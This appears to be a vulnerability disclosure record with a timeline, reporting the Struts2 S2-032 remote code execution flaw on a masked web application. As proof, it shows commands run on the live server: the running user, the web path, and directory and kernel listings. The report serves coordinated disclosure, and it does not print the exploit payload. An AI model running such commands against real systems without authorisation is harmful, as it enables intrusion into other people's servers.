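2016-05-19: Details reported to the vendor; awaiting vendor handling
2016-05-21: Vendor confirmed; details disclosed to the vendor only
2016-05-31: Details disclosed to core white hats and experts in the relevant field
2016-06-10: Details disclosed to regular white hats
2016-06-20: Details disclosed to intern white hats
2016-07-05: Details disclosed to the public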
Vulnerable site: **.**.**.**/APHSQD/login.action
The site is affected by the Struts2 S2-032 vulnerability.
Target: **.**.**.**/APHSQD/forgetPassword.action
Useage: S2-032
Whoami: phsqdmgr
WebPath: /WEBAP/APSOURCE/APHSQD/JBOSS/DEFAULT/

cmd-> ls
========================================
classpath.sh jboss_init_hpux.sh jboss_init_redhat.sh jboss_init_solaris.sh jboss_init_suse.sh
probe.bat probe.sh run.bat run.conf run.jar run.sh security_cc.policy
shutdown.bat shutdown.jar shutdown.sh shutdown-shortcut.bat shutdown-shortcut.sh
startAPHSQD.sh stopAPHSQD.sh twiddle.bat twiddle.jar twiddle.sh velocity.log velocity.log.1
wsconsume.bat wsconsume.sh wsprovide.bat wsprovide.sh wsrunclient.bat wsrunclient.sh wstools.bat wstools.sh

cmd-> uname -r
========================================
2.6.18-164.11.1.el5xen

cmd-> ls /
========================================
APBPP APCCE APCDWS APENG APESRM APFOSP APHSAP APHSQD APIIP APINA APMAVN APMSP APNPB APNPC
APPXC APPXD APPXF APQTD APSRMPF APSYSL1 bin boot dev DUPNFS etc filestore home lib lib64
lost+found media misc mnt net NODUPFILE opt PBPP PCCE PCDWS PENG PESRM PFOSP PHSAP PHSQD
PIIP PINA PMAVN PMSP PNPB PNPC PPXC PPXD PPXF PPXM PQTD proc PSRMPF root sbin selinux
SOURCE srv sys tftpboot tmp usr var WEBAP WEBAPLOG
Severity: High
Vulnerability Rank: 18
Confirmed: 2016-05-21 01:37
Thank you for the report.
None at this time.